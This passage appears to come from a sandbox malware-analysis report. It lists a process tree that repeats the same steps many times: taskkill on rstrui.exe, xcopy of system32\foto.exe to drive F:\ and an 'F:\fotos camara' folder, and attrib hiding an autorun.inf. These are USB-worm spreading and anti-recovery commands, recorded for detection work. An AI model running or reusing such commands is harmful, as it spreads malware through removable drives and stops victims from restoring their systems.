    taskkill /f /im "rstrui.exe"
    3⤵
    PID:1760
- - C:\Windows\SysWOW64\xcopy.exe
    xcopy /h/c/q/y C:\Windows\system32\foto.exe F:\
    3⤵
    PID:1960
- - C:\Windows\SysWOW64\xcopy.exe
    xcopy /h/c/q/y C:\Windows\system32\foto.exe "F:\\fotos camara\"
    3⤵
    PID:2376
- - C:\Windows\SysWOW64\attrib.exe
    attrib -A +H +S +R F:\autorun.inf
    3⤵
    PID:924
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /f /im "rstrui.exe"
    3⤵
    PID:1640
- - C:\Windows\SysWOW64\xcopy.exe
    xcopy /h/c/q/y C:\Windows\system32\foto.exe F:\
    3⤵
    PID:1956
- - C:\Windows\SysWOW64\xcopy.exe
    xcopy /h/c/q/y C:\Windows\system32\foto.exe "F:\\fotos camara\"
    3⤵
    PID:1520
- - C:\Windows\SysWOW64\attrib.exe
    attrib -A +H +S +R F:\autorun.inf
    3⤵
    PID:2444
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /f /im "rstrui.exe"
    3⤵
    - System Location Discovery: System Language Discovery
    PID:2424
- - C:\Windows\SysWOW64\xcopy.exe
    xcopy /h/c/q/y C:\Windows\system32\foto.exe F:\
    3⤵
    PID:1976
- - C:\Windows\SysWOW64\xcopy.exe
    xcopy /h/c/q/y C:\Windows\system32\foto.exe "F:\\fotos camara\"
    3⤵
    PID:1008
- - C:\Windows\SysWOW64\attrib.exe
    attrib -A +H +S +R F:\autorun.inf
    3⤵
    PID:596
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /f /im "rstrui.exe"
    3⤵
    PID:920
- - C:\Windows\SysWOW64\xcopy.exe
    xcopy /h/c/q/y C:\Windows\system32\foto.exe F:\
    3⤵
    PID:324
- - C:\Windows\SysWOW64\xcopy.exe
    xcopy /h/c/q/y C:\Windows\system32\foto.exe "F:\\fotos camara\"
    3⤵
    - System Location Discovery: System Language Discovery
    PID:2676
- - C:\Windows\SysWOW64\attrib.exe
    attrib -A +H +S +R F:\autorun.inf
    3⤵
    - Sets file to hidden
    PID:2864
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /f /im "rstrui.exe"
    3⤵
    PID:1128
- - C:\Windows\SysWOW64\xcopy.exe
    xcopy /h/c/q/y C:\Windows\system32\foto.exe F:\
    3⤵
    - System Location Discovery: System Language Discovery
    PID:376
- - C:\Windows\SysWOW64\xcopy.exe
    xcopy /h/c/q/y C:\Windows\system32\foto.exe "F:\\fotos camara\"
    3⤵
    PID:272
- - C:\Windows\SysWOW64\attrib.exe
    attrib -A +H +S +R F:\autorun.inf
    3⤵
    PID:1800
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /f /im "rstrui.exe"
    3⤵
    PID:2628
- - C:\Windows\SysWOW64\xcopy.exe
    xcopy /h/c/q/y C:\Windows\system32\foto.exe F:\
    3⤵
    PID:3040
- - C:\Windows\SysWOW64\xcopy.exe
    xcopy /h/c/q/y C:\Windows\system32\foto.exe "F:\\fotos camara\"
    3⤵
    PID:2644
- - C:\Windows\SysWOW64\attrib.exe
    attrib -A +H +S +R F:\autorun.inf
    3⤵
    - System Location Discovery: System Language Discovery
    PID:2888
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /f /im "rstrui.exe"
    3⤵
    - Kills process with taskkill
    PID:2452
- - C:\Windows\SysWOW64\xcopy.exe
    xcopy /h/c/q/y C:\Windows\system32\foto.exe F:\
    3⤵
    PID:1604
- - C:\Windows\SysWOW64\xcopy.exe
    xcopy /h/c/q/y C:\Windows\system32\foto.exe "F:\\fotos camara\"
    3⤵
    PID:2504
- - C:\Windows\SysWOW64\attrib.exe
    attrib -A +H +S +R F:\autorun.inf
    3⤵
    PID:2336
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /f /im "rstrui.exe"
    3⤵
    PID:1108
- - C:\Windows\SysWOW64\xcopy.exe
    xcopy /h/c/q/y C:\Windows\system32\foto.exe F:\
    3⤵
    - Enumerates system info in registry
    PID:1064
- - C:\Windows\SysWOW64\xcopy.exe
    xcopy /h/c/q/y C:\Windows\system32\foto.exe "F:\\fotos camara\"
    3⤵
    PID:2328
- - C:\Windows\SysWOW64\attrib.exe
    attrib -A +H +S +R F:\autorun.inf
    3⤵
    - Views/modifies file attributes
    PID:1948
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /f /im "rstrui.exe"
    3⤵
    PID:2384
- - C:\Windows\SysWOW64\xcopy.exe
    xcopy /h/c/q/y C:\Windows\system32\foto.exe F:\
    3⤵
    PID:1828
- - C:\Windows\SysWOW64\xcopy.exe
    xcopy /h/c/q/y C:\Windows\system32\foto.exe "F:\\fotos camara\"
    3⤵
    PID:2468
- - C:\Windows\SysWOW64\attrib.exe
    attrib -A +H +S +R F:\autorun.inf
    3⤵
    - Views/modifies file attributes
    PID:1756
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /f /im "rstrui.exe"
    3⤵
    - Kills process with taskkill
    PID:1836
- - C:\Windows\SysWOW64\xcopy.exe
    xcopy /h/c/q/y C:\Windows\system32\foto.exe F:\
    3⤵
    - System Location Discovery: System Language Discovery
    PID:1072
- - C:\Windows\SysWOW64\xcopy.exe
    xcopy /h/c/q/y C:\Windows\system32\foto.exe "F:\\fotos camara\"
    3⤵
    PID:2680
- - C:\Windows\SysWOW64\attrib.exe
    attrib -A +H +S +R F:\autorun.inf
    3⤵
    - System Location Discovery: System Language Discovery
    - Views/modifies file attributes
    PID:2036
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /f /im "rstrui.exe"
    3⤵
    PID:868
- - C:\Windows\SysWOW64\xcopy.exe
    xcopy /h/c/q/y C:\Windows\system32\foto.exe F:\
    3⤵
    PID:2572
- - C:\Windows\SysWOW64\xcopy.exe
    xcopy /h/c/q/y C:\Windows\system32\foto.exe "F:\\fotos camara\"
    3⤵
    PID:1908
- - C:\Windows\SysWOW64\attrib.exe
    attrib -A +H +S +R F:\autorun.inf
    3⤵
    PID:2568
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /f /im "rstrui.exe"
    3⤵
    - Kills process with taskkill
    PID:1376
- - C:\Windows\SysWOW64\xcopy.exe
    xcopy /h/c/q/y C:\Windows\system32\foto.exe F:\
    3⤵
    PID:1936
- - C:\Windows\SysWOW64\xcopy.exe
    xcopy /h/c/q/y C:\Windows\system32\foto.exe "F:\\fotos camara\"
    3⤵
    PID:2116
- - C:\Windows\SysWOW64\attrib.exe
    attrib -A +H +S +R F:\autorun.inf
    3⤵
    - Views/modifies file attributes
    PID:1628
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /f /im "rstrui.exe"
    3⤵
    PID:2712
- - C:\Windows\SysWOW64\xcopy.exe
    xcopy /h/c/q/y C:\Windows\system32\foto.exe F:\
    3⤵
    PID:2564
- - C:\Windows\SysWOW64\xcopy.exe
    xcopy /h/c/q/y C:\Windows\system32\foto.exe "F:\\fotos camara\"
    3⤵
    PID:2724
- - C:\Windows\SysWOW64\attrib.exe
    attrib -A +H +S +R F:\autorun.inf
    3⤵
    PID:1644
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /f /im "rstrui.exe"
    3⤵
    PID:3056
- - C:\Windows\SysWOW64\xcopy.exe
    xcopy /h/c/q/y C:\Windows\system32\foto.exe F:\
    3⤵
    PID:2736
- - C:\Windows\SysWOW64\xcopy.exe
    xcopy /h/c/q/y C:\Windows\system32\foto.exe "F:\\fotos camara\"
    3⤵
    PID:3012
- - C:\Windows\SysWOW64\attrib.exe
    attrib -A +H +S +R F:\autorun.inf
    3⤵
    - Views/modifies file attributes
    PID:3016
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /f /im "rstrui.exe"
    3⤵
    - Kills process with taskkill
    PID:2992
- - C:\Windows\SysWOW64\xcopy.exe
    xcopy /h/c/q/y C:\Windows\system32\foto.exe F:\
    3⤵
    PID:2824
- - C:\Windows\SysWOW64\xcopy.exe
    xcopy /h/c/q/y C:\Windows\system32\foto.exe "F:\\fotos camara\"
    3⤵
    PID:2940
- - C:\Windows\SysWOW64\attrib.exe
    attrib -A +H +S +R F:\autorun.inf
    3⤵
    - Drops autorun.inf file
    - System Location Discovery: System Language Discovery
    PID:2812
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /f /im "rstrui.exe"
    3⤵
    - System Location Discovery: System Language Discovery
    PID:2952
- - C:\Windows\SysWOW64\xcopy.exe
    xcopy /h/c/q/y C:\Windows\system32\foto.exe F:\
    3⤵
    PID:2956
- - C:\Windows\SysWOW64\xcopy.exe
    xcopy /h/c/q/y C:\Windows\system32\foto.exe "F:\\fotos camara\"
    3⤵
    PID:2212
- - C:\Windows\SysWOW64\attrib.exe
    attrib -A +H +S +R F:\autorun.inf
    3⤵
    - System Location Discovery: System Language Discovery
    PID:2916
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /f /im "rstrui.exe"
    3⤵
    PID:580
- - C:\Windows\SysWOW64\xcopy.exe
    xcopy /h/c/q/y C:\Windows\system32\foto.exe F:\
    3⤵
    PID:2816
- - C:\Windows\SysWOW64\xcopy.exe
    xcopy /h/c/q/y C:\Windows\system32\foto.exe "F:\\fotos camara\"
    3⤵
    PID:2804
- - C:\Windows\SysWOW64\attrib.exe
    attrib -A +H +S +R F:\autorun.inf
    3⤵
    - Sets file to hidden
    - Drops autorun.inf file
    PID:2788
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /f /im "rstrui.exe"
    3⤵
    PID:2988
- - C:\Windows\SysWOW64\xcopy.exe
    xcopy /h/c/q/y C:\Windows\system32\foto.exe F:\
    3⤵
    PID:2772
- - C:\Windows\SysWOW64\xcopy.exe
    xcopy /h/c/q/y C:\Windows\system32\foto.exe "F:\\fotos camara\"
    3⤵
    PID:1988
- - C:\Windows\SysWOW64\attrib.exe
    attrib -A +H +S +R F:\autorun.inf
    3⤵
    - Drops autorun.inf file
    PID:2608
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /f /im "rstrui.exe"
    3⤵
    PID:1212
- - C:\Windows\SysWOW64\xcopy.exe
    xcopy /h/c/q/y C:\Windows\system32\foto.exe F:\
    3⤵
    - System Location Discovery: System Language Discovery
    PID:2284
- - C:\Windows\SysWOW64\xcopy.exe
    xcopy /h/c/q/y C:\Windows\system32\foto.exe "F:\\fotos camara\"
    3⤵
    PID:1464
- - C:\Windows\SysWOW64\attrib.exe
    attrib -A +H +S +R F:\autorun.inf
    3⤵
    - Views/modifies file attributes
    PID:2892
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /f /im "rstrui.exe"
    3⤵
    - Kills process with taskkill
    PID:1788
- - C:\Windows\SysWOW64\xcopy.exe
    xcopy /h/c/q/y C:\Windows\system32\foto.exe F:\
    3⤵
    PID:1636
- - C:\Windows\SysWOW64\xcopy.exe
    xcopy /h/c/q/y C:\Windows\system32\foto.exe "F:\\fotos camara\"
    3⤵
    PID:3036
- - C:\Windows\SysWOW64\attrib.exe
    attrib -A +H +S +R F:\autorun.inf
    3⤵
    PID:2756
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /f /im "rstrui.exe"
    3⤵
    PID:1136
- - C:\Windows\SysWOW64\xcopy.exe
    xcopy /h/c/q/y C:\Windows\system32\foto.exe F:\
    3⤵
    - Enumerates system info in registry
    PID:2188
- - C:\Windows\SysWOW64\xcopy.exe
    xcopy /h/c/q/y C:\Windows\system32\foto.exe "F:\\fotos camara\"
    3⤵
    PID:1484
- - C:\Windows\SysWOW64\attrib.exe
    attrib -A +H +S +R F:\autorun.inf
    3⤵
    PID:1612
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /f /im "rstrui.exe"
    3⤵
    PID:1692
- - C:\Windows\SysWOW64\xcopy.exe
    xcopy /h/c/q/y C:\Windows\system32\foto.exe F:\
    3⤵
    PID:2828
- - C:\Windows\SysWOW64\xcopy.exe
    xcopy /h/c/q/y C:\Windows\system32\foto.exe "F:\\fotos camara\"
    3⤵
    PID:2084
- - C:\Windows\SysWOW64\attrib.exe
    attrib -A +H +S +R F:\autorun.inf
    3⤵
    - Drops autorun.inf file
    PID:2088
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /f /im "rstrui.exe"
    3⤵
    - Kills process with taskkill
    PID:2040
- - C:\Windows\SysWOW64\xcopy.exe
    xcopy /h/c/q/y C:\Windows\system32\foto.exe F:\
    3⤵
    PID:2692
- - C:\Windows\SysWOW64\xcopy.exe
    xcopy /h/c/q/y C:\Windows\system32\foto.exe "F:\\fotos camara\"
    3⤵
    PID:524
- - C:\Windows\SysWOW64\attrib.exe
    attrib -A +H +S +R F:\autorun.inf
    3⤵
    PID:1180
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /f /im "rstrui.exe"
    3⤵
    - Kills process with taskkill
    PID:2292
- - C:\Windows\SysWOW64\xcopy.exe
    xcopy /h/c/q/y C:\Windows\system32\foto.exe F:\
    3⤵
    PID:2140
- - C:\Windows\SysWOW64\xcopy.exe
    xcopy /h/c/q/y C:\Windows\system32\foto.exe "F:\\fotos camara\"
    3⤵
    PID:1596
- - C:\Windows\SysWOW64\attrib.exe
    attrib -A +H +S +R F:\autorun.inf
    3⤵
    - Views/modifies file attributes
    PID:108
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /f /im "rstrui.exe"
    3⤵
    PID:1408
- - C:\Windows\SysWOW64\xcopy.exe
    xcopy /h/c/q/y C:\Windows\system32\foto.exe F:\
    3⤵
    PID:112
- - C:\Windows\SysWOW64\xcopy.exe
    xcopy /h/c/q/y C:\Windows\system32\foto.exe "F:\\fotos camara\"
    3⤵
    PID:456
- - C:\Windows\SysWOW64\attrib.exe
    attrib -A +H +S +R F:\autorun.inf
    3⤵
    - Sets file to hidden
    - Views/modifies file attributes
    PID:1080
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /f /im "rstrui.exe"
    3⤵
    PID:624
- - C:\Windows\SysWOW64\xcopy.exe
    xcopy /h/c/q/y C:\Windows\system32\foto.exe F:\
    3⤵
    PID:2176
- - C:\Windows\SysWOW64\xcopy.exe
    xcopy /h/c/q/y C:\Windows\system32\foto.exe "F:\\fotos camara\"
    3⤵
    PID:2032
- - C:\Windows\SysWOW64\attrib.exe
    attrib -A +H +S +R F:\autorun.inf
    3⤵
    - Sets file to hidden
    - System Location Discovery: System Language Discovery
    PID:1600
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /f /im "rstrui.exe"
    3⤵
    PID:836
- - C:\Windows\SysWOW64\xcopy.exe
    xcopy /h/c/q/y C:\Windows\system32\foto.exe F:\
    3⤵
    PID:2252
- - C:\Windows\SysWOW64\xcopy.exe
    xcopy /h/c/q/y C:\Windows\system32\foto.exe "F:\\fotos camara\"
    3⤵
    PID:1432
- - C:\Windows\SysWOW64\attrib.exe
    attrib -A +H +S +R F:\autorun.inf
    3⤵
    - Sets file to hidden
    PID:944
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /f /im "rstrui.exe"
    3⤵
    PID:2132
- - C:\Windows\SysWOW64\xcopy.exe
    xcopy /h/c/q/y C:\Windows\system32\foto.exe F:\
    3⤵
    PID:2260
- - C:\Windows\SysWOW64\xcopy.exe
    xcopy /h/c/q/y C:\Windows\system32\foto.exe "F:\\fotos camara\"
    3⤵
    PID:2404
- - C:\Windows\SysWOW64\attrib.exe
    attrib -A +H +S +R F:\autorun.inf
    3⤵
    - System Location Discovery: System Language Discovery
    PID:1760
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /f /im "rstrui.exe"
    3⤵
    - Kills process with taskkill
    PID:1960
- - C:\Windows\SysWOW64\xcopy.exe
    xcopy /h/c/q/y C:\Windows\system32\foto.exe F:\
    3⤵
    PID:1972
- - C:\Windows\SysWOW64\xcopy.exe
    xcopy /h/c/q/y C:\Windows\system32\foto.exe "F:\\fotos camara\"
    3⤵
    PID:1720
- - C:\Windows\SysWOW64\attrib.exe
    attrib -A +H +S +R F:\autorun.inf
    3⤵
    PID:672
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /f /im "rstrui.exe"
    3⤵
    PID:2216
- - C:\Windows\SysWOW64\xcopy.exe
    xcopy /h/c/q/y C:\Windows\system32\foto.exe F:\
    3⤵
    PID:1940
- - C:\Windows\SysWOW64\xcopy.exe
    xcopy /h/c/q/y C:\Windows\system32\foto.exe "F:\\fotos camara\"
    3⤵
    PID:888
- - C:\Windows\SysWOW64\attrib.exe
    attrib -A +H +S +R F:\autorun.inf
    3⤵
    - Views/modifies file attributes
    PID:2424
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /f /im "rstrui.exe"
    3⤵
    PID:1976
- - C:\Windows\SysWOW64\xcopy.exe
    xcopy /h/c/q/y C:\Windows\system32\foto.exe F:\
    3⤵
    PID:1504
- - C:\Windows\SysWOW64\xcopy.exe
    xcopy /h/c/q/y C:\Windows\system32\foto.exe "F:\\fotos camara\"
    3⤵
    - System Location Discovery: System Language Discovery
    - Enumerates system info in registry
    PID:1980
- - C:\Windows\SysWOW64\attrib.exe
    attrib -A +H +S +R F:\autorun.inf
    3⤵
    PID:532
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /f /im "rstrui.exe"
    3⤵
    PID:2028
- - C:\Windows\SysWOW64\xcopy.exe
    xcopy /h/c/q/y C:\Windows\system32\foto.exe F:\
    3⤵
    PID:1624
- - C:\Windows\SysWOW64\xcopy.exe
    xcopy /h/c/q/y C:\Windows\system32\foto.exe "F:\\fotos camara\"
    3⤵
    PID:1668
- - C:\Windows\SysWOW64\attrib.exe
    attrib -A +H +S +R F:\autorun.inf
    3⤵
    PID:1128
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /f /im "rstrui.exe"
    3⤵
    PID:376
- - C:\Windows\SysWOW64\xcopy.exe
    xcopy /h/c/q/y C:\Windows\system32\foto.exe F:\
    3⤵
    - Enumerates system info in registry
    PID:1968
- - C:\Windows\SysWOW64\xcopy.exe
    xcopy /h/c/q/y C:\Windows\system32\foto.exe "F:\\fotos camara\"
    3⤵
    PID:2656
- - C:\Windows\SysWOW64\attrib.exe
    attrib -A +H +S +R F:\autorun.inf
    3⤵
    - Sets file to hidden
    - Drops autorun.inf file
    PID:2628
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /f /im "rstrui.exe"
    3⤵
    - Kills process with taskkill
    PID:3040
- - C:\Windows\SysWOW64\xcopy.exe
    xcopy /h/c/q/y C:\Windows\system32\foto.exe F:\
    3⤵
    PID:2232
- - C:\Windows\SysWOW64\xcopy.exe
    xcopy /h/c/q/y C:\Windows\system32\foto.exe "F:\\fotos camara\"
    3⤵
    PID:1052
- - C:\Windows\SysWOW64\attrib.exe
    attrib -A +H +S +R F:\autorun.inf
    3⤵
    - Drops autorun.inf file
    - Views/modifies file attributes
    PID:2452
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /f /im "rstrui.exe"
    3⤵
    PID:1604
- - C:\Windows\SysWOW64\xcopy.exe
    xcopy /h/c/q/y C:\Windows\system32\foto.exe F:\
    3⤵
    PID:2460
- - C:\Windows\SysWOW64\xcopy.exe
    xcopy /h/c/q/y C:\Windows\system32\foto.exe "F:\\fotos camara\"
    3⤵
    PID:1276
- - C:\Windows\SysWOW64\attrib.exe
    attrib -A +H +S +R F:\autorun.inf
    3⤵
    PID:1664
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /f /im "rstrui.exe"
    3⤵
    PID:1732
- - C:\Windows\SysWOW64\xcopy.exe
    xcopy /h/c/q/y C:\Windows\system32\foto.exe F:\
    3⤵
    PID:1608
- - C:\Windows\SysWOW64\xcopy.exe
    xcopy /h/c/q/y C:\Windows\system32\foto.exe "F:\\fotos camara\"
    3⤵
    PID:1616
- - C:\Windows\SysWOW64\attrib.exe
    attrib -A +H +S +R F:\autorun.inf
    3⤵
    PID:2384
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /f /im "rstrui.exe"
    3⤵
    - Kills process with taskkill
    PID:1828
- - C:\Windows\SysWOW64\xcopy.exe
    xcopy /h/c/q/y C:\Windows\system32\foto.exe F:\
    3⤵
    - Enumerates system info in registry
    PID:2264
- - C:\Windows\SysWOW64\xcopy.exe
    xcopy /h/c/q/y C:\Windows\system32\foto.exe "F:\\fotos camara\"
    3⤵
    PID:1592
- - C:\Windows\SysWOW64\attrib.exe
    attrib -A +H +S +R F:\autorun.inf
    3⤵
    PID:1836
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /f /im "rstrui.exe"
    3⤵
    PID:1072
- - C:\Windows\SysWOW64\xcopy.exe
    xcopy /h/c/q/y C:\Windows\system32\foto.exe F:\
    3⤵
    PID:876
- - C:\Windows\SysWOW64\xcopy.exe
    xcopy /h/c/q/y C:\Windows\system32\foto.exe "F:\\fotos camara\"
    3⤵
    PID:2244
- - C:\Windows\SysWOW64\attrib.exe
    attrib -A +H +S +R F:\autorun.inf
    3⤵
    - Drops autorun.inf file
    PID:868
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /f /im "rstrui.exe"
    3⤵
    - Kills process with taskkill
    PID:2572
- - C:\Windows\SysWOW64\xcopy.exe
    xcopy /h/c/q/y C:\Windows\system32\foto.exe F:\
    3⤵
    - Enumerates system info in registry
    PID:1552
- - C:\Windows\SysWOW64\xcopy.exe
    xcopy /h/c/q/y C:\Windows\system32\foto.exe "F:\\fotos camara\"
    3⤵
    PID:2624
- - C:\Windows\SysWOW64\attrib.exe
    attrib -A +H +S +R F:\autorun.inf
    3⤵
    - Drops autorun.inf file
    - Views/modifies file attributes
    PID:1376
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /f /im "rstrui.exe"
    3⤵
    PID:1936
- - C:\Windows\SysWOW64\xcopy.exe
    xcopy /h/c/q/y C:\Windows\system32\foto.exe F:\
    3⤵
    PID:832
- - C:\Windows\SysWOW64\xcopy.exe
    xcopy /h/c/q/y C:\Windows\system32\foto.exe "F:\\fotos camara\"
    3⤵
    PID:1060
- - C:\Windows\SysWOW64\attrib.exe
    attrib -A +H +S +R F:\autorun.inf
    3⤵
    - Views/modifies file attributes
    PID:1648
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /f /im "rstrui.exe"
    3⤵
    - Kills process with taskkill
    PID:2564
- - C:\Windows\SysWOW64\xcopy.exe
    xcopy /h/c/q/y C:\Windows\system32\foto.exe F:\
    3⤵
    - Enumerates system info in registry
    PID:2700
- - C:\Windows\SysWOW64\xcopy.exe
    xcopy /h/c/q/y C:\Windows\system32\foto.exe "F:\\fotos camara\"
    3⤵
    PID:2980
- - C:\Windows\SysWOW64\attrib.exe
    attrib -A +H +S +R F:\autorun.inf
    3⤵
    - Sets file to hidden
    PID:3060
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /f /im "rstrui.exe"
    3⤵
    PID:1560
- - C:\Windows\SysWOW64\xcopy.exe
    xcopy /h/c/q/y C:\Windows\system32\foto.exe F:\
    3⤵
    PID:2784
- - C:\Windows\SysWOW64\xcopy.exe
    xcopy /h/c/q/y C:\Windows\system32\foto.exe "F:\\fotos camara\"
    3⤵
    - System Location Discovery: System Language Discovery
    PID:2992
- - C:\Windows\SysWOW64\attrib.exe
    attrib -A +H +S +R F:\autorun.inf
    3⤵
    - Drops autorun.inf file
    PID:2824
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /f /im "rstrui.exe"
    3⤵
    PID:2940
- - C:\Windows\SysWOW64\xcopy.exe
    xcopy /h/c/q/y C:\Windows\system32\foto.exe F:\
    3⤵
    PID:2912
- - C:\Windows\SysWOW64\xcopy.exe
    xcopy /h/c/q/y C:\Windows\system32\foto.exe "F:\\fotos camara\"
    3⤵
    PID:2868
- - C:\Windows\SysWOW64\attrib.exe
    attrib -A +H +S +R F:\autorun.inf
    3⤵
    - Drops autorun.inf file
    PID:2896
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /f /im "rstrui.exe"
    3⤵
    PID:2884
- - C:\Windows\SysWOW64\xcopy.exe
    xcopy /h/c/q/y C:\Windows\system32\foto.exe F:\
    3⤵
    PID:2820
- - C:\Windows\SysWOW64\xcopy.exe
    xcopy /h/c/q/y C:\Windows\system32\foto.exe "F:\\fotos camara\"
    3⤵
    PID:2944
- - C:\Windows\SysWOW64\attrib.exe
    attrib -A +H +S +R F:\autorun.inf
    3⤵
    PID:2552
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /f /im "rstrui.exe"
    3⤵
    - Kills process with taskkill
    PID:3052
- - C:\Windows\SysWOW64\xcopy.exe
    xcopy /h/c/q/y C:\Windows\system32\foto.exe F:\
    3⤵
    PID:2832
- - C:\Windows\SysWOW64\xcopy.exe
    xcopy /h/c/q/y C:\Windows\system32\foto.exe "F:\\fotos camara\"
    3⤵
    PID:2988
- - C:\Windows\SysWOW64\attrib.exe
    attrib -A +H +S +R F:\autorun.inf
    3⤵
    - Drops autorun.inf file
    PID:2772
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /f /im "rstrui.exe"
    3⤵
    - Kills process with taskkill
    PID:1988
- - C:\Windows\SysWOW64\xcopy.exe
    xcopy /h/c/q/y C:\Windows\system32\foto.exe F:\
    3⤵
    PID:736
- - C:\Windows\SysWOW64\xcopy.exe
    xcopy /h/c/q/y C:\Windows\system32\foto.exe "F:\\fotos camara\"
    3⤵
    PID:1212
- - C:\Windows\SysWOW64\attrib.exe
    attrib -A +H +S +R F:\autorun.inf
    3⤵
    - Drops autorun.inf file
    PID:2284
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /f /im "rstrui.exe"
    3⤵
    PID:1464
- - C:\Windows\SysWOW64\xcopy.exe
    xcopy /h/c/q/y C:\Windows\system32\foto.exe F:\
    3⤵
    PID:2860
- - C:\Windows\SysWOW64\xcopy.exe
    xcopy /h/c/q/y C:\Windows\system32\foto.exe "F:\\fotos camara\"
    3⤵
    - Enumerates system info in registry
    PID:2092
- - C:\Windows\SysWOW64\attrib.exe
    attrib -A +H +S +R F:\autorun.inf
    3⤵
    PID:1160
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /f /im "rstrui.exe"
    3⤵
    PID:3036
- - C:\Windows\SysWOW64\xcopy.exe
    xcopy /h/c/q/y C:\Windows\system32\foto.exe F:\
    3⤵
    PID:932
- - C:\Windows\SysWOW64\xcopy.exe
    xcopy /h/c/q/y C:\Windows\system32\foto.exe "F:\\fotos camara\"
    3⤵
    PID:1136
- - C:\Windows\SysWOW64\attrib.exe
    attrib -A +H +S +R F:\autorun.inf
    3⤵
    - Sets file to hidden
    PID:2188
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /f /im "rstrui.exe"
    3⤵
    PID:1484
- - C:\Windows\SysWOW64\xcopy.exe
    xcopy /h/c/q/y C:\Windows\system32\foto.exe F:\
    3⤵
    PID:1576
- - C:\Windows\SysWOW64\xcopy.exe
    xcopy /h/c/q/y C:\Windows\system32\foto.exe "F:\\fotos camara\"
    3⤵
    PID:1436
- - C:\Windows\SysWOW64\attrib.exe
    attrib -A +H +S +R F:\autorun.inf
    3⤵
    - Sets file to hidden
    - Views/modifies file attributes
    PID:2180
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /f /im "rstrui.exe"
    3⤵
    PID:2684
- - C:\Windows\SysWOW64\xcopy.exe
    xcopy /h/c/q/y C:\Windows\system32\foto.exe F:\
    3⤵
    PID:2764
- - C:\Windows\SysWOW64\xcopy.exe
    xcopy /h/c/q/y C:\Windows\system32\foto.exe "F:\\fotos camara\"
    3⤵
    PID:2040
- - C:\Windows\SysWOW64\attrib.exe
    attrib -A +H +S +R F:\autorun.inf
    3⤵
    PID:2692
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /f /im "rstrui.exe"
    3⤵
    - Kills process with taskkill
    PID:524
- - C:\Windows\SysWOW64\xcopy.exe
    xcopy /h/c/q/y C:\Windows\system32\foto.exe F:\
    3⤵
    PID:776
- - C:\Windows\SysWOW64\xcopy.exe
    xcopy /h/c/q/y C:\Windows\system32\foto.exe "F:\\fotos camara\"
    3⤵
    - System Location Discovery: System Language Discovery
    PID:2292
- - C:\Windows\SysWOW64\attrib.exe
    attrib -A +H +S +R F:\autorun.inf
    3⤵
    - Drops autorun.inf file
    PID:2140
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /f /im "rstrui.exe"
    3⤵
    PID:1596
- - C:\Windows\SysWOW64\xcopy.exe
    xcopy /h/c/q/y C:\Windows\system32\foto.exe F:\
    3⤵
    PID:956
- - C:\Windows\SysWOW64\xcopy.exe
    xcopy /h/c/q/y C:\Windows\system32\foto.exe "F:\\fotos camara\"
    3⤵
    PID:1408
- - C:\Windows\SysWOW64\attrib.exe
    attrib -A +H +S +R F:\autorun.inf
    3⤵
    - Sets file to hidden
    - Views/modifies file attributes
    PID:112
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /f /im "rstrui.exe"
    3⤵
    PID:456
- - C:\Windows\SysWOW64\xcopy.exe
    xcopy /h/c/q/y C:\Windows\system32\foto.exe F:\
    3⤵
    PID:1676
- - C:\Windows\SysWOW64\xcopy.exe
    xcopy /h/c/q/y C:\Windows\system32\foto.exe "F:\\fotos camara\"
    3⤵
    PID:624
- - C:\Windows\SysWOW64\attrib.exe
    attrib -A +H +S +R F:\autorun.inf
    3⤵
    - Sets file to hidden
    - Drops autorun.inf file
    PID:2176
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /f /im "rstrui.exe"
    3⤵
    PID:2032
- - C:\Windows\SysWOW64\xcopy.exe
    xcopy /h/c/q/y C:\Windows\system32\foto.exe F:\
    3⤵
    - System Location Discovery: System Language Discovery
    PID:860
- - C:\Windows\SysWOW64\xcopy.exe
